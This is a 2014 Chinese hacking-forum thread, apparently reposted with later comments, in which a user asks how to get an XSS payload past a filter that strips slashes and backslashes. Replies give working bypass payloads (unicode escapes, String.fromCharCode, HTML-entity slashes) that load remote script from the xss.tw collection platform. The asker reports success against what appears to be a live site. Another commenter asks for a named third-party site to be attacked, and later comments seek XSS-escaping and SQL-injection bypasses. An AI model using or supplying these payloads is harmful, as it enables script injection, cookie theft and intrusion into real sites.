过滤了符号 \ 和 / 该如何绕过进行 XSS 攻击?

超威蓝猫 (‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮) | 2014-01-25 15:43

传入

<script src="//xss.tw/4091"></script>

输出

<script src="xss.tw4091"><script>

求大牛支招。

[原文地址]

各种吐槽:

1#

乌云 | 2014-01-25 15:45

我就做第一个关注你的把!

2#

dtc (路过)‮(油酱) | 2014-01-25 15:51

<img src="#" onerror="$.getScript('\u002f\u002fxss.tw\u002f4091')">

3#

超威蓝猫 (‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮) | 2014-01-25 15:54

@dtc 感谢。但我发现连 \ 也过滤了..

4#

/fd (/proc) ‫() | 2014-01-25 15:55

html entity

5#

dtc (路过)‮(油酱) | 2014-01-25 15:56

<img src="#" onerror="var a=String.fromCharCode(47);$.getScript(a+a+'xss.tw'+a+'4091')">

顺便看看你那站有没有加载jq...

6#

超威蓝猫 (‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮) | 2014-01-25 16:02

@dtc 用String.fromCharCode的话会变成这样:

<img src="#" onerror="var" a="String.fromCharCode(47);$.getScript(a+a+xss.tw+a+4091)">

有加载jq。

7#

dtc (路过)‮(油酱) | 2014-01-25 16:04

@超威蓝猫 =_=那就把var去掉算了。。应该不会有大问题。。

8#

dtc (路过)‮(油酱) | 2014-01-25 16:04

@超威蓝猫 单引号都被干掉了=_=..把单引号换成&quot;试试...

9#

超威蓝猫 (‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮) | 2014-01-25 16:11

@dtc 虽然没有成功但还是谢谢你:]

10#

dtc (路过)‮(油酱) | 2014-01-25 16:16

囧= =

11#感谢(1)

0x_Jin (世上人多心不齐) | 2014-01-25 16:17

@超威蓝猫 实体编码一下就好了

<script src="http:&#47;&#47;xss.tw&#47;&#47;1111">

12#

超威蓝猫 (‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮) | 2014-01-25 16:22

@0x_Jin 我的天..成功了 感谢一个

13#

RootUser | 2014-01-25 16:37

mark

14#

咖啡 (乌云在我们心里搁下一块阴影我聆听沉寂已久的心情) | 2014-01-25 18:56

学习了

15#

wefgod (求大牛指点) | 2014-01-25 19:00

189啊?看来0day了啊

16#

超威蓝猫 (‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮) | 2014-01-25 20:11

@wefgod 大牛光临此贴 受宠若惊

17#

超级大菜鸟 | 2014-01-25 20:32

http://www.jzbkq.com 楼主 这个站求X 非法占 你注册个账号X试试

18#

0x_Jin (世上人多心不齐) | 2014-01-25 20:38

@超威蓝猫 - - 这是常识性问题而已

19#

Ki11 (ฏ๎๎๎๎๎๎๎๎๎ฏ ้้้้้็็็็็้้้้็็็็็ฏด้้้้้็็็็็้้้้้็็็็็้้้้้็็็้็็็ ้้้้้็็็็็้้้้็็็็็ฏ๎็็็็็็oด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็ ้้้้้็็็็็้้้้็็็็็ฏด้้้้้็็็็็้้ ้้้้้็็็็็้้้้็็็็็ฏ๎๎๎๎๎๎๎๎๎ฏฏด้้้้้็็็็็้้o ้้้) | 2014-01-25 21:35

@0x_Jin 真的是 常识 性问题吗

20#

Oops (头像是柚木(RIO))‮(谢感边右) | 2014-01-25 21:53

@0x_Jin 反射总是遇到把&当连接参数处理.然后就忽略了它

21#

回复此人感谢

wefgod (求大牛指点) | 2014-01-25 22:01

@超威蓝猫 别这样……

22#

0x_Jin (世上人多心不齐) | 2014-01-25 22:12

@Oops 我插件上带了 &# url编码 转码一下就好了

23#

核攻击 (统治全球,奴役全人类!毁灭任何胆敢阻拦的有机生物!) | 2014-01-26 17:44

晕 这方法太多了吧,编码,变形,加密,混淆……

<script>document.write(String.fromCharCode('47','92'))</script>

留言评论(旧系统):

佚名 @ 2014-01-27 17:22:16

核总 我今天也遇到一个站....吧<>过滤了 有什么办法吗?

本站回复:

只过滤 <> 的话,方法太多了(src,style,css,onload,onerror,onmosemove,onclick,on...),具体看情况。 Bypass xss过滤的测试方法:http://lcx.cc/?i=4172 【讨论帖】XSS,过滤/和空格还有其他办法吗?:http://lcx.cc/?i=3425 Cross-Site Scripting XSS 跨站攻击全攻略:http://lcx.cc/?i=1220 XSS与字符编码的那些事儿 ---科普文:http://lcx.cc/?i=3964 XSS的常见变换.PDF:http://lcx.cc/?i=1649 http://www.google.com.hk/search?q=site:lcx.cc+xss

佚名 @ 2014-03-07 11:07:53

过滤了()怎么办?

本站回复:

凉拌!

佚名 @ 2014-11-24 21:35:35

并不是作为Javascript的变量,只是简单的文章输出,<>被过滤为&lt;和&gt怎么办

本站回复:

要看具体环境的,例如:onerror、onload、onmousemove 之类的事件可以利用。

佚名 @ 2014-11-26 16:47:59

关于XSS 可能核总还不是很了解我的意思,就是如果 他返回的结果连<>都转换过了,成&lt等,但这不是基于DOM, 如:<p>&lt;script&gt;alert(1)&lt;/srcript&gt; 这是一个很常见的抵御XSS的防御机制,我找不到绕过的方法,核总你怎么看? 应该怎么绕过

本站回复:

看xss插入点在哪里,如果xss点是你例子这样,那基本没用了。

俊裕 @ 2014-11-28 00:20:33

核总,没错,又是我这个菜鸟,来问问题了。 这次是SQL的问题 为什么有一些注入点, url大概是:ArticleID.asp?id=123 提交' 报错 提交&" 不报错 and 1=1是正常的页面显示, 但 and 1=2 还是正常的,而且应该怎么绕过。

本站回复:

不清楚,看具体环境。